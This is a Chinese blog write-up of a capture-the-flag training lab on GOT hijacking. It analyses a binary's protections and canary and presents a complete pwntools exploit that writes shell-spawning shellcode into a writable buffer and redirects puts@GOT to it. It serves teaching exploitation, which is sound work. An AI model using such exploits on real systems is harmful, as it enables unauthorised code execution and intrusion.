[NTUSTISC pwn LAB 4]gothijacking

最新推荐文章于 2024-01-17 15:37:25 发布
最新推荐文章于 2024-01-17 15:37:25 发布
阅读量455 收藏
点赞数
分类专栏: Pwn 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44867432/article/details/122026296
版权

[NTUSTISC pwn LAB 4]gothijacking

1、检查保护

开启了Canary栈溢出保护,同时有可读可写可执行的段,got表可写入。

请添加图片描述

2、程序分析

(1)静态分析

一般带canary的栈保护措施都会向栈中写入一串随机数,然后执行完某个步骤进行随机数比对,若相同则继续执行,若不同则退出程序。通过观察反汇编代码,输出what’s your name后需要向name所在地址中输入0x40长度的数据。name在bss段的长度为:0xBF-0X80+1=64。通过检查保护措施看到有RWX的段,是否可以通过向name中写入shellcode然后将程序执行流指向name的起始地址呢?此时需要进行栈溢出控制返回地址,但是由于canary的存在,栈溢出的方式去控制程序执行流需要泄露canary或ROP的方式,并且read函数的长度也没有超出大小。继续观察反汇编代码,输出Where do you want to write?,然后需要输入64位无符号数。

“%lld"和”%llu"是linux下gcc/g++用于long long int类型(64 bits)输入输出的格式符。void *buf则为“无类型指针”,void* 可以指向任何类型的数据。但是反汇编代码中并没有对*buf指针进行初始化,[rsp+0h] [rbp-10h]指明了其在栈上的位置。通过输入scanf输入长度为8字节数据后,指针变量buf中存储的就是输入的地址。程序继续执行到read函数,向buf也就是之前输入的地址中输入长度为8的数据,程序继续执行。
请添加图片描述

canary 机制

fs为段寄存器,程序从fs:28h处取 8 字节的值放在栈上,Canary值在rbp到rsp之间(并不一定是rbp-8的位置)。

.text:000000000040071F                 mov     rax, fs:28h
.text:0000000000400728                 mov     [rbp+var_8], rax
.text:000000000040072C                 xor     eax, eax

.text:0000000000400804                 xor     rcx, fs:28h
.text:000000000040080D                 jz      short locret_400814
.text:000000000040080F                 call    ___stack_chk_fail

函数返回前,再次从fs:28h处将值取出,与栈上的值进行比较,如果改变则终止程序。

(2)动态分析

请添加图片描述

3、漏洞利用

(1)利用思路

该程序存在任意地址写的漏洞,通过向存在RWX权限的name数组中写入shellcode,然后劫持puts的plt表项到name的起始地址,即可控制程序执行流。进而获取shell。

(2)利用过程

1)shellcode生成
sc = asm(shellcraft.sh())
2)name地址获取

请添加图片描述

3)puts@plt获取

objdump -d gothijack

请添加图片描述

4)exp编写
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process("./gothijack")
p.recvuntil("?\n")
sc = asm(shellcraft.sh())
p.send(sc)
p.recvuntil("?\n")
p.sendline(str(0x601018))#注意scanf与read对应sendline与send
p.recvuntil(": ")
p.send(p64(0x601080))
p.interactive()

4、动态验证

查看0x601018地址,此时还是put@plt,并未改变。0x10gx 0x601018

请添加图片描述

通过DEBUG信息发送的信息已经成功存储到name中。x/20i 0x601080

请添加图片描述

进入read函数发现put@plt更改为name的地址。

请添加图片描述

请添加图片描述
最后成功获取shell.
请添加图片描述

请添加图片描述

5、指针复盘

假设定义一个指针p。那么会经常使用到三个符号:p、*p、&p

p是一个指针变量的名字,表示此指针变量指向的内存地址,如果使用%p来输出的话,它将是一个16进制数。

而*p表示此指针指向的内存地址中存放的内容,一般是一个和指针类型一致的变量或者常量。

&是取地址运算符,&p就是取指针p的地址。

指针p同时也是个变量,既然是变量,编译器肯定要为其分配内存地址,就像程序中定义了一个int型的变量i,编译器要为其分配一块内存空间一样。

指针类型一致的变量或者常量。

&是取地址运算符,&p就是取指针p的地址。

指针p同时也是个变量,既然是变量,编译器肯定要为其分配内存地址,就像程序中定义了一个int型的变量i,编译器要为其分配一块内存空间一样。

而&p就表示编译器为变量p分配的内存地址,而因为p是一个指针变量,这种特殊的身份注定了它要指向另外一个内存地址,程序员按照程序的需要让它指向一个内存地址,这个它指向的内存地址就用p表示。而且,p指向的地址中的内容就用*p表示。

Always5572
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习】GOT表劫持
Morphy_Amo的博客
12-15 3873
文章目录例题GOT表劫持获取Syscallopen-read-write利用系统调用号调用open构造payload获取syscall读取flag文件exp 例题 例题:XCTF-008-Recho 查看安全策略 root@kali:~/ctf/xctf/pwn# checksec 008_Recho [*] '/root/ctf/xctf/pwn/008_Recho' Arch: amd64-64-little RELRO: Partial RELRO Stac
hal stm32g4 pwn.zip
07-23
蓝桥杯的pwn stm43g4平台
Linux GOT Hijack
12-30
一份学习linux缓冲区的资料。讲elf的got表在缓冲区溢出中的利用
hijack GOT
weixin_73481933的博客
01-28 188
这是main函数,起始的ask_username函数和ask_password函数应该就是检查登录的函数,可以看到当command = 2时执行put_file函数,command = 3时执行show_dir函数,command = 1时执行get_file函数(判断条件应该是ida解析的时候出现问题了,应该都没有“!在没有开启RELRO保护的前提下,每个libc的函数对应的GOT表项是可以被修改的。这个函数会有一次输入,让我们选择要打印的文件,并且打印出我们输入的文件内容,并且能够在最后看到很明显的。
NTUSTISC(台科大資訊安全研究社)pwn bof
carol2358的博客
04-03 764
题目来自:https://isc.taiwan-te.ch/scoreboard/ 记录一下pwn题 bof, 初始pwn题 栈溢出,覆盖返回地址就可以 根据function prologue: push rbp mov rbp, rsp sub rsp, 0x10 得出偏移地址0x18 用 objdump -d bof 得出跳转位置 0x0000000000400607 然后写exp:...
NTUSTISC pwn LAB 3栈溢出
qq_44867432的博客
12-17 293
NTUSTISC pwn LAB 3栈溢出: 1、检查保护 2、程序分析 1)静态分析 IDA查看反汇编代码发现read函数,buf显然可以产生栈溢出,但是没有看到message的大小。通过ALT+T快捷键搜索关键词message,发现其在.bss段开启了一块0x8F-0x60+1=0x30的空间,即使填入很长的数据,message依然不能利用栈溢出。也没有在IDA中看到自定义的函数以及一些关键性的“/bin/sh”等可利用的关键字符串出现,但查看保护措施时Has RWX segments提示有可读可写可
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn入门题目汇总.rar
09-01
4. **shellcode**:构造一段小型的机器码(shellcode),当执行流到达攻击者控制的地址时,这段代码会被执行,通常目的是获取一个shell,即系统的命令行界面。 5. **栈保护机制的绕过**:现代操作系统和编译器为了...
PNW入门之got表覆写-附件资源
03-05
PNW入门之got表覆写-附件资源
Hijack攻击揭秘
realmeh的专栏
01-11 1898
概述 Clickjacking是最近新兴的针对WEB前端的攻击手段。它通常使用一个ifream覆盖掉当前页面,欺骗用户点击iframe中的恶意内容。 Likejacking通常是针对社交网站的一种攻击手法,攻击者会欺骗用户去点击一个伪造的图标或按钮。如今攻击者已经研究出了大量的方法,来把官方的按钮模仿的惟妙惟肖。 Clickjacking技术首先是由Jeremiah Gros
缓冲区溢出基础实践(二)——ROP 与 hijack GOT
weixin_34015336的博客
06-11 725
3.ROP    ROP 即 Return Oritented Programming ,其主要思想是在栈缓冲区溢出的基础上,通过程序和库函数中已有的小片段(gadgets)构造一组串联的指令序列,形成攻击所需要的 shellcode 来实现攻击效果。这种方式不需要注入新的指令到漏洞程序就可以改变某些寄存器或者变量的值,从而改变程序的执行流程。   攻击者可以通过工具对目标程序搜索,寻找所需要...
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 431
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
关于GOT表和PLT表的学习
月阴荒的博客
03-17 1892
参考链接 https://mp.weixin.qq.com/s/yf55JtvSKK70AuqBIpVNTA 我们先看来自ctf-wiki上的解释 hijack GOT, 打个比喻,可以理解为狸猫换太子,修改某一个被调用函数的地址,让其指向另一个函数,例如修改printf()函数的地址让其指向system(),这样做的结果就是原本对于printf()的调用就变成了调用system()函数。 然后我...
好好说话之hijack GOT
hollk’s blog
08-07 1406
这种方法的原理其实和栈溢出很相似,基本流程都是泄露libc,查找system函数,写/bin/sh字符串,所以你看过我以前的博客,相信理解这个原理以及例题会很容易,一起加油,祝我们早日成为大佬????
PWN入门第一节(缓冲区溢出之栈溢出上篇)
xiaobai的博客
06-23 695
0x10 本期简介 在计算机安全领域,缓冲区溢出是个古老而经典的话题。众所周知,计算机程序的运行依赖于函数调用栈。栈溢出是指在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。本文将以32位x86架构下的程序为例讲解栈溢出的技术详情。 为了实现栈溢出,要满足两个条件。第一,程序要有向栈内写入数据的行为;第二,程序并不限制写入数据的长度。历史上第一例被广泛注意的“莫里斯蠕虫”病毒就是利用C语言标准库的 gets() 函数并未限制输入数据长度的漏洞,从而实现了栈溢出。 Fig 1. 波士
PWN · GOT表劫持 | 整数溢出】[HGAME 2023 week1]choose_the_seat
Mr_Fmnwon的博客
01-17 435
整数溢出,加之保护开的不全,可以反复越界修改got表,劫持puts函数实现利用
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 2884
强网杯2022 pwn 赛题分析——house_of_cat
stm32f4 pwn adc声音
08-06
STM32F4是一款强大的微控制器,它具备PWM(脉冲宽度调制)和ADC(模数转换器)功能,可以用来实现音频输出和声音采集。 PWM技术可以通过调整信号的占空比,来生成不同的电平模式,进而产生特定频率的方波信号。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值